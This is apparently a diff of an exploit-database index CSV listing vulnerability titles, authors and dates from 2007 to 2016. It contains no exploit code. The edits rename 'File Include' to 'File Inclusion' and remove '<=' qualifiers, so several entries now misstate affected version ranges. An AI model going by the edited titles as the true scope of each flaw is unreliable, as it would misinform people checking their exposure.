+29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service and Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 29523,platforms/osx/dos/29523.txt,"Apple 10.4.x Software Update Format String",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 @@ -26565,7 +26565,7 @@ id,file,description,date,author,platform,type,port 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_Mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 Admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x FName Parameter Information Disclosure",2007-01-26,ajann,php,webapps,0 -29531,platforms/windows/dos/29531.txt,"Yahoo! Messenger <= 8.0 Notification Message HTML Injection",2007-01-26,"Hai Nam Luke",windows,dos,0 +29531,platforms/windows/dos/29531.txt,"Yahoo! Messenger 8.0 Notification Message HTML Injection",2007-01-26,"Hai Nam Luke",windows,dos,0 29532,platforms/osx/dos/29532.txt,"Apple Installer Package 2.1.5 Filename Format String",2007-01-27,LMH,osx,dos,0 29533,platforms/asp/webapps/29533.html,"AdMentor Admin Login SQL Injection",2007-01-27,Cr@zy_King,asp,webapps,0 29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 Show_Webfeed.php SQL Injection",2007-01-27,St[at]rExT,php,webapps,0 @@ -26573,19 +26573,19 @@ id,file,description,date,author,platform,type,port 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0 29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 Index.php SQL Injection",2007-01-27,adexior,php,webapps,0 29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client DAPCNFSD.DLL Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 -29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Include",2007-01-30,Tr_ZiNDaN,php,webapps,0 +29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,r00t,php,webapps,0 39839,platforms/osx/dos/39839.txt,"Apple Quicktime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0 29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 -29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.php Local File Include",2007-02-26,"D. Matscheko",php,webapps,0 +29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.php Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - Post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 29684,platforms/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote,0 -29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader <= 7.0.9 - Information Disclosure",2007-02-28,pdp,windows,remote,0 +29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader 7.0.9 - Information Disclosure",2007-02-28,pdp,windows,remote,0 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0 @@ -26600,11 +26600,11 @@ id,file,description,date,author,platform,type,port 29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 -29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 Import_XML.php Remote File Include",2007-01-31,trzindan,php,webapps,0 +29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 CMDMon.SYS Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 -29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 Lang.php Remote File Include",2007-02-02,"Hasadya Raed",php,webapps,0 +29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 Lang.php Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 Index.php Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 29562,platforms/php/webapps/29562.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29563,platforms/php/webapps/29563.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 @@ -26612,11 +26612,11 @@ id,file,description,date,author,platform,type,port 29565,platforms/php/webapps/29565.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 -29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Include Vulnerabilities",2007-02-05,anonymous,php,webapps,0 -29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.php3 - Remote File Include",2007-02-06,Blaster,php,webapps,0 +29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Inclusion Vulnerabilities",2007-02-05,anonymous,php,webapps,0 +29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.php3 - Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 -29572,platforms/php/webapps/29572.txt,"CPanel <= 11 PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 +29572,platforms/php/webapps/29572.txt,"CPanel 11 PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 29574,platforms/php/webapps/29574.php,"eXtreme File Hosting Arbitrary RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 29575,platforms/windows/remote/29575.txt,"Plain Old Webserver 0.0.7/0.0.8 Firefox Extension Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 @@ -26654,7 +26654,7 @@ id,file,description,date,author,platform,type,port 29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 unistall.php Authentication Bypass",2007-02-26,r00t,php,webapps,0 29607,platforms/windows/dos/29607.html,"EasyMail Objects 6.x Connect Method Remote Stack Buffer Overflow",2007-02-02,"Paul Craig",windows,dos,0 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 index.php hier Parameter XSS",2007-02-16,sn0oPy,php,webapps,0 -29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 Include.php Remote File Include",2007-02-16,KaRTaL,php,webapps,0 +29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 Include.php Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0 29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps,0 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 H_Goster.ASP SQL Injection",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF",2013-11-15,"Yakir Wizman",hardware,webapps,0 @@ -26685,12 +26685,12 @@ id,file,description,date,author,platform,type,port 29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 install/index.php step Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 index.php load Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 index.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0 -29640,platforms/php/webapps/29640.txt,"Shop Kit Plus StyleCSS.php Local File Include",2007-02-23,"laurent gaffie",php,webapps,0 -29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 Index.php Local File Include",2007-02-23,"laurent gaffie",php,webapps,0 +29640,platforms/php/webapps/29640.txt,"Shop Kit Plus StyleCSS.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 +29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 Index.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 29642,platforms/php/webapps/29642.txt,"Simple one-file gallery gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 29643,platforms/php/webapps/29643.txt,"Simple one-file gallery gallery.php f Parameter XSS",2007-02-23,"laurent gaffie",php,webapps,0 -29644,platforms/php/webapps/29644.txt,"Pickle 0.3 Download.php Local File Include",2007-02-24,"laurent gaffie",php,webapps,0 -29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 ShowCode.php Local File Include",2007-02-24,"Simon Bonnard",php,webapps,0 +29644,platforms/php/webapps/29644.txt,"Pickle 0.3 Download.php Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 +29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 ShowCode.php Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 data/flatevents.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 data/js.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 data/m_2.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 @@ -26707,9 +26707,9 @@ id,file,description,date,author,platform,type,port 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service (DoS)",2007-02-25,sehato,windows,dos,0 29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x index.php searchkey Parameter XSS",2007-02-24,r00t,php,webapps,0 29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x modules/htmlframechat/index.php Multiple Parameter XSS",2007-02-24,r00t,php,webapps,0 -29663,platforms/php/webapps/29663.txt,"SolarPay Index.php Local File Include",2007-02-26,"Hasadya Raed",php,webapps,0 +29663,platforms/php/webapps/29663.txt,"SolarPay Index.php Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps,0 29664,platforms/windows/dos/29664.txt,"Microsoft Office Publisher 2007 - Remote Denial of Service (DoS)",2007-02-26,"Tom Ferris",windows,dos,0 -29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Include",2007-02-26,"Simon Bonnard",php,webapps,0 +29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 29667,platforms/php/webapps/29667.txt,"WordPress Euclid Theme 1.x.x - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29668,platforms/php/webapps/29668.txt,"WordPress Dimension Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 @@ -26718,7 +26718,7 @@ id,file,description,date,author,platform,type,port 30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 -30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 +30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.php Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 @@ -26761,7 +26761,7 @@ id,file,description,date,author,platform,type,port 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-24,"Mike Czumak",windows,local,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"Fish Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 -29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.php Remote File Include",2007-03-09,"Hasadya Raed",php,webapps,0 +29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,linux,dos,0 29725,platforms/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow",2007-03-09,"Alfredo Ortega",openbsd,remote,0 @@ -26775,23 +26775,23 @@ id,file,description,date,author,platform,type,port 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 29734,platforms/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote García",linux,remote,7443 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,hardware,remote,0 -29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.php Remote File Include",2007-03-12,"RaeD Hasadya",php,webapps,0 -29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.php Local File Include",2007-03-13,"BorN To K!LL",php,webapps,0 +29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.php Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 +29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS)",2007-03-13,"Michal Majchrowicz",windows,dos,0 29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 -29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail <= 4.0.4 Client Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 +29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service (DoS)",2007-03-15,"David Matousek",windows,dos,0 -29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 Index.php Remote File Include",2007-03-15,"Abdus Samad",php,webapps,0 -29745,platforms/php/webapps/29745.txt,"Horde Framework <= 3.1.3 Login.php Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 +29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 Index.php Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 +29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 Login.php Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29749,platforms/multiple/remote/29749.txt,"Oracle Portal 10g P_OldURL Parameter Cross-Site Scripting",2007-03-16,d3nx,multiple,remote,0 29750,platforms/php/webapps/29750.php,"PHPStats 0.1.9 - Multiple SQL Injection Vulnerabilities",2007-03-16,rgod,php,webapps,0 29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 PHP-Stats-Options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 -29752,platforms/php/remote/29752.php,"PHP <= 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 +29752,platforms/php/remote/29752.php,"PHP 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) <= 4.13 Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 Administrator Password Change",2007-03-19,Kacper,php,webapps,0 @@ -26800,7 +26800,7 @@ id,file,description,date,author,platform,type,port 29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Include And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 +29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 profile.php showuser Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 @@ -26814,18 +26814,18 @@ id,file,description,date,author,platform,type,port 29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 contact.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 login.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 -29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Include Vulnerabilities",2007-03-26,Crackers_Child,php,webapps,0 +29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion Vulnerabilities",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 Index.php Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-22,"Mike Czumak",windows,local,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 29781,platforms/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference DoS",2007-03-26,"Joey Mengele",linux,dos,0 -29782,platforms/php/webapps/29782.txt,"Satel Lite Satellite.php Local File Include",2007-11-26,rUnViRuS,php,webapps,0 +29782,platforms/php/webapps/29782.txt,"Satel Lite Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 -29784,platforms/php/remote/29784.php,"PHP <= 5.2.1 Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 +29784,platforms/php/remote/29784.php,"PHP 5.2.1 Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 29785,platforms/php/remote/29785.txt,"aBitWhizzy whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 29786,platforms/php/webapps/29786.txt,"aBitWhizzy whizzylink.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 29787,platforms/windows/dos/29787.py,"HP Jetdirect FTP Print Server RERT Command Denial of Service",2007-01-18,Handrix,windows,dos,0 -29788,platforms/php/remote/29788.php,"PHP <= 4.4.4 Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 +29788,platforms/php/remote/29788.php,"PHP 4.4.4 Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 30105,platforms/php/webapps/30105.txt,"WordPress Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 @@ -26839,7 +26839,7 @@ id,file,description,date,author,platform,type,port 30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 -30117,platforms/php/remote/30117.php,"PHP <= 5.1.6 Chunk_Split() Function Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 +30117,platforms/php/remote/30117.php,"PHP 5.1.6 Chunk_Split() Function Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 - gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 - ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 - ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 @@ -26852,7 +26852,7 @@ id,file,description,date,author,platform,type,port 30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 - plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 - index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 - common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30130,platforms/php/remote/30130.txt,"PHP <= 5.2.3 EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 +30130,platforms/php/remote/30130.txt,"PHP 5.2.3 EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM Title Parameter Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) Cross-Site script",2007-06-01,"Glafkos Charalambous ",php,webapps,0 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 chat.php sid Parameter XSS",2007-06-01,ReZEN,php,webapps,0 @@ -26889,9 +26889,9 @@ id,file,description,date,author,platform,type,port 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0 -30177,platforms/php/webapps/30177.txt,"PlaySms <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 +30177,platforms/php/webapps/30177.txt,"PlaySms 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl 